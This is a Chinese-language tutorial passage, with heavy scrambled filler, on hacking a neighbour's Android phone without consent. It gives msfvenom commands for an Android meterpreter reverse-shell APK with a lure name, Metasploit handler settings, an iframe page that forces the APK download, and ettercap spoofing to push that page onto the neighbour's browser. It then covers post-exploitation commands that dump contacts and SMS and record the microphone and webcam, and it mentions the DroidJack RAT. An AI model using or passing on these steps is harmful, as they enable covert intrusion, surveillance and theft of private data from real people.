) v- L m% ~ b! J4 r 五、msf+ettercap入侵邻居安卓手机 / k3 k) E }; B' P3 T" Q$ r
3 S/ w2 d7 J! w$ s J
2 f& P/ j- d3 w \0 }' K 首先启动msf ; }: n4 i( G$ V6 N( v. ^
+ }3 J: t# z' n& Q0 x7 C3 C
" {* l0 {7 Y- n 先用kali生成一个安卓木马,如下命令: . X- i$ q C- a; H3 G) o
( d, B; n( ?/ ]" d
+ B4 _. t6 a. k& u0 w- J Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
. W3 X$ }6 C# U& G4 h' u ( k' x9 C' `2 S5 D6 r( w* u7 k
: H" `6 O. X8 Y& i; C$ z( a: o
为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
5 }& P& T0 P* ]6 p/ R' t/ U$ m+ Z
8 h* y6 v! i% U8 x/ `7 n6 I
& A& J+ b+ S% r( [; U1 n( p 然后进入msf & K- z/ y0 [9 Q6 H$ S: N
+ Y" y- x+ x' v: p, J9 M6 ?, a- d
0 ]4 Q$ F1 U7 `- u$ m! R
use exploit/multi/handler
, A# A: m; X8 d1 ^ R
5 \2 i: `9 N# O, \
7 W3 M% \- {2 _ @0 A! w: P set payload android/meterpreter/reverse_tcp
- ^4 I- T4 b( j( ] # |* S, o- R, a. x. r' U
+ C' g0 G' Z0 z+ q) Q T
set LHOST 192.168.0.109 //ip为kaili的ip
; i. u* d$ E* e, r; Y. a
2 l. W# A+ F+ c& u8 L. s
7 V' A# R" U e' q% n3 g set LPORT 44444 //端口一定要与前面生成的木马的端口一致 / w- S! y) c5 y- L0 N
. ?$ U" g& D/ V; w$ `
9 |: n5 E1 E v, f1 S# G: B Exploit / V6 m! P" w' R5 z2 i
4 I1 {3 P$ A5 ?1 y5 N0 b" R" G' P/ L! |5 m) U
+ b$ }1 J$ s. R- L* s: ?
4 j, @# V% Y8 {3 X" H0 z8 g
; M8 ]- ]+ u% \5 _" F 下面我们开启ettercap -G
8 |4 [+ `+ |2 [4 w' V$ O 8 f6 J+ u: G; F4 ]
, O$ G7 P) M* T 我物理IP为
6 D1 a! B' I' O" A% h( {4 R
0 p5 R# u* Y3 i" ^; m) o3 R6 H$ \! k. W6 G% C3 P' T9 e
. l9 t& Z& l& J' w ' \/ e$ Q, i- h8 a9 [( I. I
# m, F7 z4 I* H$ I) c 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
4 k9 U/ O& S' Q S* {+ [( x7 Y0 p - F* S. @ X3 y) {2 N0 Z
" p Y- N {8 @ 下面我们来设置一下 h1 u& E2 ^ M6 Y% X1 z4 u
4 Z& `5 z1 c N# [
s9 @3 `, T; P5 z1 k* U% Y: Z
$ k* i7 e1 k2 z + Z; k( ?9 j/ H% z
" V0 l6 K9 y. v
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ' d" _$ l' z% f: T1 k! a
0 v! y! l r8 c F/ [7 Z& i. l) P3 T6 V( u4 G
. k+ G' A- i: p( ]" h V- j8 s
; ?. y9 Y _. V4 ^, V& A8 u2 S( o) m; R7 p2 W
, @: V& B; d9 w |, s; Y! [
1 W% K6 K$ B6 b& y$ f5 G; j9 b3 e3 ~' L/ D
9 i/ ~" K, N0 m& o0 k& _5 `6 ^' M
2 J. Q5 l+ m( s9 j% m0 d0 n; Q4 {/ y# J
2 h; x8 P a! e5 E: o( `7 X9 F3 @
/ I+ H, X$ Z9 W. O9 U) {+ R0 A! m
2 s) `. {7 L. o
" K2 C0 x/ D& F4 u& k
/ p( T7 Q5 [3 E, {& [* p: e* [
! |, W S7 B7 h; }; U. G
4 V, G5 o* g" D4 i$ t x) B3 y- z2 B' n4 }& R$ T
; q) I, v. M8 [! ^+ u! H5 Z/ m3 V . G3 r6 N; j, f$ `9 ]
/ V0 c+ T2 Z- @3 o% D; p8 u% j2 g3 S" D6 H) H+ I5 n# d* M
. Z9 d0 }$ u: K4 Q& ^$ a
# ? ^! B! \1 Q9 P5 W! l
F3 Q" R8 ]- k, m. r( l6 i( w: s3 s
1 I! C: N% t7 w6 [) d' r& B ! K9 m8 }- Q" j9 `7 @1 C, J
! c4 {7 Y* G: K3 Q9 J- `
3 R/ z- W& x' V: Y
& X1 l2 f) D3 o; t" W7 T
3 d, `0 W/ L5 G1 ?% U
; M+ J/ `4 _$ Y , {5 a$ P, ]; H5 I: L& P6 ?3 }
5 S- E r& d( V1 I4 H% c9 R7 u
# u' q6 |! L7 F% B8 U6 f* l# h- p * P4 Y& l2 X3 q; s
0 c' `! F. r* {" q3 }6 T7 z8 h2 k 9 D% l( @% I) c! S8 x o/ g
( |! \. |* L7 v) q
# H$ y+ _- S0 m3 U$ n! l+ U 下面我们开始攻击 ; h+ t4 w0 u: S; ~( E1 r
+ V& K+ F7 w `" W- y6 Q7 t( L% I
/ v" b; {$ }8 d1 M& u; {" O & a- }' v- A1 X0 {0 D) }
2 n9 M$ r- G. L! e# o. D; ~6 T7 M4 \) t% Q
) s( ?1 e& {% q# Y4 v 8 I6 y& F" W9 ?- j/ v
3 j2 E* _9 |( h* Z% t
+ P8 {4 |& A( b
- K% e1 `' y' x' z8 H* v3 ^% }5 Q
4 h1 |; r' Q5 T4 Z1 p 5 u o. E. g* a* I2 X
& \& `: |4 X2 y
& y5 p7 |' F7 a7 W
6 _3 j! H) s9 _; c4 }
( H5 f9 i: d7 s! [8 i2 `/ s
大概过了5分钟多,发现反弹成功了
. @9 z3 T) o# t1 j2 G# u 9 Q: |* z; p, S$ L3 g* b B
1 K1 j: x# n1 i% H4 E
9 i6 E* b. Q) s" [0 Y
+ v! d& k5 M6 U+ q* ~" }; `) c# O5 N
" K5 A' h' I3 }, M0 l. _4 G. X
7 W' e! R4 r2 E& f
0 v5 W' \* ?7 P) M3 Q7 C & N" Q8 g: q; R4 F
7 w! Y( @! T" ]3 T
2 d7 s$ a0 J* e0 u X; F ! a$ d( J0 }) s2 @( h7 d h
8 T" ? P- t& H8 a( N! W; H
5 `$ p+ y2 C$ [3 N# x+ m
' R5 @6 w6 A2 |) ?9 F4 K/ r" h9 A% x
9 p" v6 V/ c, o" R* O) [& `* J8 P) R" @0 c- u
7 v* H9 U* L# M
' M4 j8 I3 u, u: o9 s( n4 i" e: x- [2 a: k: E
/ s' j6 B2 w- }9 j4 t. O7 j! z 2 R! H2 w" N* m8 y# V
+ j6 ^% q: s0 N$ d$ X" Y& x( g
执行命令
( ?+ n$ b; Z4 @! Y( U) e( X5 a
7 K& Z- W* u4 i( u6 l5 y& `$ A! n2 |+ R: M
2 h5 j: H" C& y% N2 _1 b
* q7 d+ a, `% V! w2 l. W s3 a! t; x& h; w* l" x4 h. R, Y
dump_contacts --》这个是导出电话
: E: \* K; i+ L1 o4 c
0 Q+ G- E* P( b% _! H f! o
" O& I8 A% p# e& N( M! q% A. [ dump_sms --》这个是导出信息
1 T: G+ }: N$ W; f6 [- W) P
. Z3 t$ |0 c3 V5 D* ]; E
3 v2 }7 `+ Q9 t' v5 Z record_mic Record audio from the default microphone for X seconds # \) I7 ]# ~6 M7 [ r6 e
8 Q4 u n8 c/ V3 W. _/ [
3 y: K) v# e/ j/ P$ z% A! p
webcam_chat Start a video chat
( ^, S" M: L0 v4 h( h1 ^0 |0 s , c( \, E' Q0 K! ], M$ @# G
" n. F+ ^* j* v P, m
webcam_list List webcams & v) A% ^7 I- {/ p3 M- c. t
& m4 R& a$ U0 K6 v8 d
' F' S8 ]/ s' }/ `1 H. z6 D webcam_snap Take a snapshot from the specified webcam
6 @# w" K/ t0 a- F+ r4 L
% W# f! D. Q: h' n; ~6 S
' f1 x+ Q+ S3 A& Q, i4 m webcam_stream   lay a video stream from the specified webcam
N& x9 t3 \8 q4 J : K5 K( o* g8 Q5 w7 M m0 ^
% d- z3 Q* e) x( R4 H! a- ` 6 a2 x+ ? n$ o! b
4 P# F" h9 J( _6 o' j# u' I; s; m& O* e( V& C0 f8 \
4 d5 \5 @ @0 C' t
4 l/ ?! y6 l4 O* o$ V, {9 D9 q
4 n' e8 S- ]3 R& T5 y
我们打开看一下电话薄,
- w: s: ^+ F$ C8 Y; D 6 I; w; z `$ q- E7 s- A, @5 F
^1 Y7 t) m' T2 f" T7 t* }# q
6 n0 x% K4 S6 w
V5 e/ e3 j+ W: o3 H% o
) x# R: O0 v$ J& u# y4 D) W 1 v1 N$ o# w, b4 R
a% q* a9 Y$ z4 _: E
6 m, M% L. v# I$ f
( |1 s% L$ ~, q' R; B1 w8 e
. g3 d x, C% O7 v
2 R3 b) e# a" K! U$ @ & c/ g' C6 p( p. Z+ ^( h/ V
, p" f5 e1 b5 M- m4 Z$ L3 V# U
5 k" `4 v: n" g; t$ H7 G1 C4 M
# Q; q( W9 R) O: r8 p5 _) d 7 a B, F1 ]/ w+ T' Y T% O9 ]% n6 ^
7 p' z* E: { S4 [9 k- t3 A8 L
3 |8 J5 X; j' @ X
0 ~) { `1 W% `
& h H; e1 W1 p: `9 ~3 g4 c% X4 f3 v 我们同时欺骗成DroidJack木马,使用方法如图: 5 q& `/ o7 V! r* a3 L/ Y: Z
0 V8 |! l T7 d' N, `% v$ c& ~& y
' Z# w; J# I& E# s7 `
1 N! Z1 }5 i4 R1 | 6 j( b& ~9 N& w: {
- F7 y- q5 \5 Q7 j7 D1 \/ G. T( J , {/ T# i1 y5 j; v/ m J
& I' m4 y p- d2 ?, B, T
. k! ^4 O* Y5 W, ~3 r8 l ! {/ P! [: f. w# p- w, `5 p
% f; u: z' F" ?8 u2 q( H! h" m: a
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口
5 R+ t" I- Q6 y" W Q
' a5 A6 f. }2 u+ T \0 A l! f F, {
. v1 r9 S3 ^: n5 m/ K8 ]
' U' p9 B6 M R2 [- V6 p
# M0 q6 t. I! R9 w" x6 m' [
" V; f. k! J, O' u" Q% q
1 m z! k* X% Q6 h/ {5 j9 h4 D" R `
5 J; _8 s0 { e
7 ]4 A5 T3 \/ V
! i9 K! d) a8 \: ]9 s  $ u, A0 x3 a9 J9 z* K o
; }# h) x8 j) p9 t: I- l0 x1 I
5 l. L/ F1 L8 v
' [' o. x/ M2 H6 ]9 {. y" X
|